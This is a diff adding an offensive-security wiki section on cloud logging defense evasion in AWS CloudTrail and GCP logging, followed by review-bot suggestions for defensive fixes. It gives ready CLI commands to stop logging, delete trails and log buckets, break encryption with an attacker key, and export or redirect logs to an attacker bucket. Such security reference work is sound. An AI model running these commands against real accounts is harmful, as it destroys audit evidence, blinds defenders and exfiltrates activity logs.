mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-06-12 11:01:38 -07:00
Add content from: Blinding the Watchmen: Abusing Cloud Logging Services for De...
@@ -420,6 +420,115 @@ A tool to find a company (target) infrastructure, files, and apps on the top clo
- [https://github.com/RyanJarv/awesome-cloud-sec](https://github.com/RyanJarv/awesome-cloud-sec)
## Cloud Logging Defense Evasion & Log Exfiltration
Cloud audit pipelines are also an **attack surface**. If an attacker gets permissions over the **log router** (CloudTrail trail / GCP sink), the **destination storage** (S3 / log bucket / Cloud Storage), or the **encryption key** (KMS / CMEK), they can blind detections, destroy evidence, poison forensic data, or get passive visibility into the victim account.
### Preconditions to check
High-risk permissions in this area include:
- **AWS:** `cloudtrail:StopLogging`, `cloudtrail:DeleteTrail`, `cloudtrail:UpdateTrail`, `cloudtrail:CreateTrail`, `s3:DeleteBucket`, `s3:DeleteObject`, `s3:GetObject`, `s3:PutObject`, and KMS permissions that let an attacker swap or break the key used by CloudTrail.
- **GCP:** `logging.sinks.update`, `logging.sinks.delete`, `logging.sinks.create`, `logging.buckets.delete`, `storage.objects.get`, `storage.objects.create`, and KMS/CMEK permissions affecting log buckets.
### Common attacker playbooks
#### 1. Stop log delivery
- **AWS:** stop the trail so no new events are delivered to the configured S3 bucket.
- **GCP:** disable the sink so matching entries are no longer routed.
```bash
# AWS
aws cloudtrail stop-logging --name <trail-name>
# GCP
gcloud logging sinks update <sink-name> --disabled
```
#### 2. Delete the router or the destination
Deleting the **router** stops future delivery. Deleting the **destination** can both stop delivery and destroy historical evidence.
```bash
# AWS: delete router
aws cloudtrail delete-trail --name <trail-name>
# AWS: delete historical log storage (bucket must be empty first)
aws s3 rm s3://<cloudtrail-bucket> --recursive
aws s3api delete-bucket --bucket <cloudtrail-bucket>
# GCP: delete router
gcloud logging sinks delete <sink-name>
# GCP: delete log bucket
gcloud logging buckets delete <bucket-name> --location=<location>
```
#### 3. Break logging with an attacker-controlled encryption key
A stealthier pattern is to **repoint logging to an attacker-controlled KMS/CMEK key** that initially works, and then revoke the logging service access to that key.
- **AWS:** `update-trail --kms-key-id <attacker-key>` and then remove the `cloudtrail.amazonaws.com` access from the key policy or delete the key material. CloudTrail may surface a misleading **bucket access denied** style error even though the bucket is fine.
- **GCP:** if the log bucket already supports CMEK, update it to use an attacker-controlled key and then revoke the Cloud Logging service account decrypt permissions. Reverting may fail because the current key can no longer decrypt the bucket.
```bash
# AWS
aws cloudtrail update-trail --name <trail-name> --kms-key-id <attacker-kms-key-arn>
# GCP
gcloud logging buckets update <bucket-name> \
--location=<location> \
--cmek-kms-key-name=<full-kms-key-name>
```
#### 4. Poison historical logs
If logs are exported as **JSON objects** into object storage, an attacker with object read/write permissions can download, modify, and overwrite historical records.
- **AWS:** modify CloudTrail objects in S3. Downstream consumers such as Athena may parse the poisoned events.
- **GCP:** when sinks export to Cloud Storage, modify the stored objects there.
> [!TIP]
> In AWS, enable **CloudTrail log file integrity validation** to detect post-delivery tampering. This is especially important for trails created through CLI/API workflows.
#### 5. Create a parallel log export for passive visibility
Instead of running noisy discovery commands, an attacker can configure a **new** router that continuously exports victim activity to attacker-controlled infrastructure.
```bash
# AWS
aws cloudtrail create-trail \
--name <attacker-trail> \
--s3-bucket-name <attacker-bucket>
# GCP
gcloud logging sinks create <sink-name> <destination> --log-filter="FILTER_CONDITION"
```
This provides passive discovery of API calls, IAM changes, new compute instances, and access to sensitive services.
#### 6. Redirect the existing pipeline
Modifying the current destination is usually noisier from a defender perspective than creating a second pipeline, but it can also **blind** the original monitoring stack while exfiltrating the same logs.
```bash
# AWS
aws cloudtrail update-trail --name <trail-name> --s3-bucket-name <attacker-bucket>
# GCP
gcloud logging sinks update <sink-name> <new-destination>
```
### High-value defensive details
- **AWS CloudTrail Event History** keeps an immutable **90-day** history for **management events**, but **data** and **network** events are not covered there.
- **AWS EventBridge** rules on trail creation, modification, deletion, and `StopLogging` can catch log-plane tampering.
- **GCP `_Required`** log bucket cannot be disabled, modified, or deleted, so it is the safest place for critical audit logs.
- **GCP locked log buckets** prevent premature deletion because retention becomes irreversible until all retained entries age out.
## Google
### GCP
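Review bot: the TIP under playbook 4 should name the actual switch, because the reason CLI/API-created trails need attention is that `aws cloudtrail create-trail` and `update-trail` leave integrity validation off unless `--enable-log-file-validation` is passed, while the console enables it by default; stating that makes the tip actionable. Two smaller points for the "High-value defensive details" list: the `_Required` bullet would be stronger if it said why it matters here, namely that the Admin Activity audit entries for the sink and bucket changes in playbooks 1, 2, 3 and 6 are routed there and so remain visible after the tampering; and the "bucket must be empty first" comment in playbook 2 implies the matching mitigation, S3 Object Lock (or versioning with MFA delete) on the CloudTrail bucket, which is worth listing next to the EventBridge bullet.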
@@ -454,7 +563,15 @@ azure-security/
confidential-computing/luks2-header-malleability-null-cipher-abuse.md
{{#endref}}
## References
- [Unit 42 - Blinding the Watchmen: Abusing Cloud Logging Services for Defense Evasion and Visibility](https://unit42.paloaltonetworks.com/cloud-logging-defense-evasion/)
- [AWS CloudTrail User Guide](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.html)
- [AWS CloudTrail log file integrity validation](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html)
- [AWS CloudTrail Event History](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/view-cloudtrail-events.html)
- [Google Cloud Logging sinks](https://docs.cloud.google.com/logging/docs/export/configure_export_v2)
- [Google Cloud Logging bucket locking](https://docs.cloud.google.com/logging/docs/buckets#locking-logs-buckets)
- [Google Cloud Logging CMEK](https://docs.cloud.google.com/logging/docs/routing/managed-encryption)
{{#include ../banners/hacktricks-training.md}}
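Review bot: the new section never cites these references inline, so a reader cannot tell which statements come from the Unit 42 research (the misleading "bucket access denied" error in playbook 3, the CMEK revert failing, the "noisier" assessment in playbook 6) and which are taken from the vendor documentation; a one-line attribution at the top of "Cloud Logging Defense Evasion & Log Exfiltration", or after the affected bullets, would fix that and lets the reader check the original write-up when a behaviour changes.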